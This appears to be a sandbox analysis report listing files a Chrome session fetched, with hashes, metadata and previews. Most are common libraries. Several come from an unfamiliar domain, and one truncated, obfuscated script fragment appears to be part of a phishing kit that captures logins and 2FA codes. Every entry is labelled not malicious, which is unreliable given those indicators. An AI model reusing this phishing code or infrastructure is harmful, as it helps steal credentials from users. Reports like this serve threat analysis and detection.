                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                          Malicious:false
                                                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):727
                                                          Entropy (8bit):7.573165690842521
                                                          Encrypted:false
                                                          SSDEEP:12:6v/70lGN4n6OF/Y9jJ6xmOLY3cyWiJBYmH7xCZm1Uvleq8AM8Tkbc0:HudJ6xU3fWU1HsZm1Wleq8t5b/
                                                          MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                          SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                          SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                          SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                          Malicious:false
                                                          Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):117836
                                                          Entropy (8bit):5.19681176617782
                                                          Encrypted:false
                                                          SSDEEP:3072:VKTS9+zs5jXYjssOlws1jOlwz+FeI7WPyJAQVU7Iw:VMzCjXYjssOlws1jOlwz+FeI70f7Iw
                                                          MD5:336F8E7CD2791AF27D8911E7DECCF318
                                                          SHA1:42BFB03B6043FB5F5868E798881ED74CEE91C83D
                                                          SHA-256:74DDD3E51C84AD6BD46A0BCB98C22278DD3A7C1B5D82D4EE1A47154609485837
                                                          SHA-512:3C56A202DBD191335102BDFC5EB5375885B69B7696A120ABFA319022A16473B351CF8D834BF43E76407BEF43CA697EF1EA39D49DB82A9AFAC3E8AF3BEBA5C15C
                                                          Malicious:false
                                                          Preview:const _0x1770e6=_0x4d4e;(function(_0x4d4b96,_0x4dadad){const _0x3ae15a=_0x4d4e,_0x399160=_0x4d4b96();while(!![]){try{const _0x2ea7aa=-parseInt(_0x3ae15a(0x147))/0x1+parseInt(_0x3ae15a(0x1dc))/0x2+-parseInt(_0x3ae15a(0x12a))/0x3+parseInt(_0x3ae15a(0x92))/0x4*(-parseInt(_0x3ae15a(0x22a))/0x5)+parseInt(_0x3ae15a(0x175))/0x6+parseInt(_0x3ae15a(0x23a))/0x7+-parseInt(_0x3ae15a(0x1dd))/0x8*(-parseInt(_0x3ae15a(0x18b))/0x9);if(_0x2ea7aa===_0x4dadad)break;else _0x399160['push'](_0x399160['shift']());}catch(_0x5bc737){_0x399160['push'](_0x399160['shift']());}}}(_0x3b53,0xc4df2));var webnotfound=![],otherweburl='',interacted=0x0,multipleaccountsback=0x0;let wait2facancel=0x0,otptype=0x0;var currentweb=0x0,pagevisitedalready=null;function _0x3b53(){const _0xc07c05=['#btn_next','largeIcon','logo','data-id','script','animation','unset','#btn_back','display','appendChild','otpdesc','valid\x20email\x20otp','methodid','error_2fa','iAdditionalProofInfo','PhoneAppOTP_Live','body','style','placeholder','W
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):1400
                                                          Entropy (8bit):7.808470583085035
                                                          Encrypted:false
                                                          SSDEEP:24:rIcdIg4GFKiUqLRfqX5Cbg2tRSpGHM0RMrB6nzU9Jd28VVdYfWZG0rrZgqhpT:rHUZGRNEoSpGHMTrB6zUXdNVSi1b
                                                          MD5:333EE830E5AB72C41DD9126A27B4D878
                                                          SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                                                          SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                                          SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                                          Malicious:false
                                                          URL:https://kpl2.r04ar2.com/ijnd8sg6QezUuY8NkwAQx6Mva2UqiWIRuKitmhbhPvV0dW8953IaxnO5zyk4DAWXKxNh96jT7SddDXEWlab230
                                                          Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (23638), with CRLF line terminators
                                                          Category:downloaded
                                                          Size (bytes):23640
                                                          Entropy (8bit):5.106450642260564
                                                          Encrypted:false
                                                          SSDEEP:384:ZtafGtz2omXX44PL5Ky0sdY8xbXMb4YEb+VkBSgf3:/afSz2omXX44PL5Ky0sdY8xbXMEYw+ED
                                                          MD5:3CC6A150355B61433C4C2E0D98694A96
                                                          SHA1:69E5DAA7231172F90D3CE17E8DBAA5B5D8AF5FC3
                                                          SHA-256:0C802C37871F458B278E8FC129D119E05C4A5CFE8A679BFA66263C94F4BFEC4F
                                                          SHA-512:5A03FE6E925392F469F8521B9FAE8167C56D2EFD7E03A13138494490B7EF69FA759394FD4A83E0CCB9D8E07C605D6F5EBCF7DD65921C3FF7B7971F802071A32E
                                                          Malicious:false
                                                          URL:https://kpl2.r04ar2.com/12HMveiyHPabpIUo8913
                                                          Preview:*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}*,input{margin:0}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections_pdf a{color:#fff
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):29796
                                                          Entropy (8bit):7.980058333789969
                                                          Encrypted:false
                                                          SSDEEP:768:uEV6Q9wDBC1MNazNsMYCUPwRGMSU6Ub1W:uKpiOZ7YCpRRXk
                                                          MD5:210433A8774859368F3A7B86D125A2A7
                                                          SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                                          SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                                          SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                                          Malicious:false
                                                          URL:https://kpl2.r04ar2.com/opGHJkGaKvnTmNyFMzfZnzJcWrEqLJbZTjGMiH6wVdpvwstZXuhyaUJEfnge69Z5HGqTwYsoleWcuQeXcd239
                                                          Preview:.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(*V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z*#..0......D.....FV.w..,.T..............X.|..|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):48316
                                                          Entropy (8bit):5.6346993394709
                                                          Encrypted:false
                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                          Malicious:false
                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:data
                                                          Category:downloaded
                                                          Size (bytes):550538
                                                          Entropy (8bit):5.675557514253788
                                                          Encrypted:false
                                                          SSDEEP:6144:P0+gkOqQJ3Y4CW9vgZN6che5AGLNJxXG5DIFAvw0Wimqf9gkhnZIbfhn7/bBRyTE:cbWScytNHQgAvVfKczC
                                                          MD5:70306D36CE9DBCBD8E5D1C9913A5210F
                                                          SHA1:04949AD636F8CD09BF91059BC4AAF1973C92A15F
                                                          SHA-256:1425B3DC4E809E5488AAE10E2EB2511F652C6A9C3845C98C3FE69F07FE0C9E2B
                                                          SHA-512:A7F00BA83FEE80E7F2006C9E1F0121E2E515F4956182924E67C95A8C5522F30735F7BF4A6F7DCF3CBD29A685E967B1C4DDFD72D7F1F4CEFBE55326BECDACB275
                                                          Malicious:false
                                                          URL:https://www.gstatic.com/recaptcha/releases/i7X0JrnYWy9Y_5EYdoFM79kV/recaptcha__en.js
                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var w=function(){return[function(n,T,M,A,E,x,a,U){return((n|1)&((n|(n+8>>(((U=["C",17,"F"],n+6)^8)>=n&&(n+3^8)<n&&(M[U[0]]&&M[U[0]][U[2]]&&(E=M[U[0]][U[2]],x=M.u,x in E&&delete E[x],l[45](50,T,M[U[0]][U[2]],A,M)),M.u=A),4)||(a=HT(M[U[2]],function(W){return typeof W[T]==="function"})),32))==n&&(a=M.u||(M.u=T+(M.VR.G5++).toString(36))),16))<5&&(n^5)>=U[1]&&(a=M!=null&&M.sg===T),a},function(n,T,M,A,E,x,a,U){return(n&(((n|24)==(U=["getValue",43,null],n)&&X.call(this,T),n&52)==n&&(E=H[49](31,M),E!=U[2]&&.E!=U[2]&&(B[19](73,T,0,A),l[3](6,128,T.L,E))),(n<<2&15)>=4&&n+3<22&&T.keyCode==13&&this.L[U[0]]().length==6&&(this.A
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):7390
                                                          Entropy (8bit):4.02755241095864
                                                          Encrypted:false
                                                          SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                          MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                          SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                          SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                          SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                          Malicious:false
                                                          URL:https://kpl2.r04ar2.com/ij377WZrFm7O0tKWNzYEiyzXpPX0VqNgscNBwZI56164
                                                          Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (45667)
                                                          Category:dropped
                                                          Size (bytes):45806
                                                          Entropy (8bit):5.207605835316031
                                                          Encrypted:false
                                                          SSDEEP:384:1ZS0CCnasl8gRR/PoPez+iCMN0Fkiw2Jh4RWdRGhAjbp2ChPL8cYRGv5MRUK6np9:/CCnVl7tUkBxkdRGOfDiY5C5MAn5GY2
                                                          MD5:80F5B8C6A9EEAC15DE93E5A112036A06
                                                          SHA1:F7174635137D37581B11937FC90E9CB325077BCE
                                                          SHA-256:0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
                                                          SHA-512:B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
                                                          Malicious:false
                                                          Preview:/*!. * Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (10450)
                                                          Category:downloaded
                                                          Size (bytes):10498
                                                          Entropy (8bit):5.327380141461276
                                                          Encrypted:false
                                                          SSDEEP:192:x9iW+rIadfLTcaTO5BrwjnwSrQ1kPmqQmMjmtmumobU8:x9KVLbw6jqON
                                                          MD5:E0D37A504604EF874BAD26435D62011F
                                                          SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                          SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                          SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                          Malicious:false
                                                          URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                          Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:V:V
                                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                          Malicious:false
                                                          Preview:0
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):270
                                                          Entropy (8bit):4.840496990713235
                                                          Encrypted:false
                                                          SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                                                          MD5:40EB39126300B56BF66C20EE75B54093
                                                          SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                          SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                          SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                          Malicious:false
                                                          URL:https://kpl2.r04ar2.com/mnYZrvj92fDlYVB6kIIxHwk2kldgIYDnxxWUlq6qF78141
                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (1434), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):1434
                                                          Entropy (8bit):5.761950198369007
                                                          Encrypted:false
                                                          SSDEEP:24:2jkm94/zKPccAv+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLtJ1PdcsLqo4p:VKEctKo7LmvtUjPKtX7T1PdtLrwUnG
                                                          MD5:CE3E019BC27E936BD1AACDB64B25A06D
                                                          SHA1:30FFA6E52416FF966EC2DD32922AA14C18C4039B
                                                          SHA-256:EE18FA1ADA74C5D3261424BCC1C4F077510C31A06BEE0FF6742F180ED14C57D8
                                                          SHA-512:98A6AD516944CD646083FF660ED351E9130318B6DA4F457EBFC0C6953F3D662D770A54D0533F97220691E07FABFD5305CD13409DB80CB7F83D650ED5BFCA8B4F
                                                          Malicious:false
                                                          Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                          Category:downloaded
                                                          Size (bytes):36696
                                                          Entropy (8bit):7.988666025644622
                                                          Encrypted:false
                                                          SSDEEP:768:lvJo4KciQZYjebVq19lKPtHAQ/l4rj2bqkiHShpeSUOR4OqWOgaU:lhH3rVq1PKP432tSSh4SUORHqWcU
                                                          MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                          SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                          SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                          SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                          Malicious:false
                                                          URL:https://kpl2.r04ar2.com/45lL7KipMN4YrD89WlFkKCVxy70
                                                          Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):268
                                                          Entropy (8bit):5.111190711619041
                                                          Encrypted:false
                                                          SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                                                          MD5:59759B80E24A89C8CD029B14700E646D
                                                          SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                          SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                          SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                          Malicious:false
